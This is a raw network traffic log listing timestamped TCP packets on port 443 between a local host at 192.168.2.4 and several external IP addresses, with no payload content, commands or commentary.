Jan 16, 2025 01:32:59.061537981 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.061600924 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.061745882 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.061753988 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.111766100 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.175961971 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176100016 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176142931 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.176155090 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176211119 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176255941 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.176261902 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176331997 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176409006 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176453114 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.176460028 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176600933 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176624060 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.176631927 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.176848888 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.180540085 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.215564966 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.215599060 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.215816975 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.216335058 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.216351032 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.228501081 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.228518963 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.241938114 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:32:59.241962910 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:32:59.242161036 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:32:59.242350101 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:32:59.242364883 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:32:59.262430906 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.262494087 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.262501955 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.262587070 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.262640953 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.262648106 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.262737036 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.262778044 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.262784004 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263310909 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263387918 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.263395071 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263489962 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263690948 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.263698101 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263792992 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263819933 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263850927 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263855934 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.263864994 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263891935 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.263901949 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263911009 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.263916969 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.263951063 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.264601946 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.264672041 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.264727116 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.264745951 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.264765024 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.264771938 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.264789104 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.265619040 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.265657902 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.265665054 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.310722113 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.349500895 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.349689960 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.349752903 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.349776030 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.349867105 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.349955082 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.349998951 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350009918 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350055933 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350073099 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350081921 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350100040 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350153923 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350197077 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350204945 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350249052 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350255966 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350725889 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350781918 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350789070 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350816965 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.350857019 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.350864887 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.351633072 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.351682901 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.351691008 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.351746082 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.351763010 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.351771116 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.351797104 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.352436066 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352487087 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.352495909 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352538109 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352576971 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.352583885 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352607012 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.352623940 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352674007 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.352680922 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.352780104 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.353400946 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.353461027 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.353497028 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.353558064 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450321913 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450396061 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450448990 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450498104 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450572968 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450628042 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450673103 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450721025 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450767994 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450819016 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450861931 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.450910091 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.450958967 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451004982 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451046944 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451103926 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451456070 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451522112 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451616049 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451666117 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451716900 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451769114 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451803923 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451850891 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.451864004 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.451942921 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.452486038 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.452559948 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.452611923 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.452662945 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.452708006 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.452755928 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.452792883 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.452852964 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.453331947 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.453397036 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.453425884 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.453576088 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.453630924 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.453808069 CET	49740	443	192.168.2.4	209.94.90.1
Jan 16, 2025 01:32:59.453826904 CET	443	49740	209.94.90.1	192.168.2.4
Jan 16, 2025 01:32:59.539197922 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:32:59.539292097 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:32:59.539374113 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:32:59.539566040 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:32:59.539587021 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:32:59.681654930 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.681911945 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.681962013 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.682821035 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.682887077 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.683901072 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.683970928 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.684052944 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.684067011 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.737093925 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.781323910 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781394958 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781420946 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781449080 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781472921 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781474113 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.781512976 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781531096 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.781547070 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.781552076 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781563044 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.781593084 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.781603098 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.782111883 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.782162905 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.782181025 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.788568020 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.788631916 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.788660049 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.829812050 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.871045113 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871071100 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871107101 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871134996 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.871171951 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871191978 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871201992 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.871220112 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.871222019 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.871249914 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.871262074 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.872771025 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.872814894 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.872853041 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.872881889 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.872899055 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.872927904 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.915980101 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:32:59.920222044 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:32:59.920269966 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:32:59.921315908 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:32:59.921382904 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:32:59.958782911 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.958865881 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.958900928 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.958940983 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.958955050 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.958980083 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.959892988 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.959955931 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.959985018 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.960000992 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.960031986 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.960056067 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.960403919 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.960464001 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.960478067 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.960521936 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:32:59.960571051 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:32:59.960628986 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:33:00.099811077 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.099932909 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.101289988 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.101336956 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.105243921 CET	49741	443	192.168.2.4	151.101.194.137
Jan 16, 2025 01:33:00.105287075 CET	443	49741	151.101.194.137	192.168.2.4
Jan 16, 2025 01:33:00.142224073 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.146627903 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.146668911 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.147706985 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.147809029 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.151065111 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.151138067 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.151262999 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.151277065 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.152808905 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.200206995 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.289762974 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300373077 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300383091 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300440073 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300473928 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300487995 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.300494909 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300537109 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.300555944 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.300555944 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.300585985 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.377693892 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.377787113 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.377861977 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.378127098 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.378156900 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.380290031 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.380362034 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.380414963 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.380443096 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.380461931 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.380491972 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.380508900 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.381652117 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.381671906 CET	443	49743	208.91.114.103	192.168.2.4
Jan 16, 2025 01:33:00.381689072 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.381715059 CET	49743	443	192.168.2.4	208.91.114.103
Jan 16, 2025 01:33:00.384814024 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.384833097 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.384897947 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.384932995 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.385003090 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.387419939 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.387480021 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.474813938 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.474833965 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.474896908 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.474922895 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.474941015 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.474944115 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.474983931 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.475266933 CET	49742	443	192.168.2.4	65.9.66.107
Jan 16, 2025 01:33:00.475286961 CET	443	49742	65.9.66.107	192.168.2.4
Jan 16, 2025 01:33:00.495440960 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:00.495471001 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:00.495585918 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:00.495783091 CET	49747	443	192.168.2.4	65.9.66.13
Jan 16, 2025 01:33:00.495798111 CET	443	49747	65.9.66.13	192.168.2.4
Jan 16, 2025 01:33:00.838179111 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.838531017 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.838593960 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.840022087 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.840089083 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.840539932 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.840611935 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.840791941 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.840811014 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.886593103 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.941946983 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942017078 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942051888 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942063093 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.942094088 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942137957 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942148924 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.942167044 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942224979 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942224979 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.942239046 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942279100 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.942524910 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942578077 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.942620039 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.942631006 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.952641010 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.952687025 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:00.952699900 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:00.999824047 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.030975103 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.030986071 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.031035900 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.031068087 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.031088114 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.031089067 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.031089067 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.031107903 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.031126022 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.031193018 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.031193972 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.031193972 CET	49746	443	192.168.2.4	151.101.2.137
Jan 16, 2025 01:33:01.032800913 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.032820940 CET	443	49746	151.101.2.137	192.168.2.4
Jan 16, 2025 01:33:01.032886982 CET	49746	443	192.168.2.4	151.101.2.137
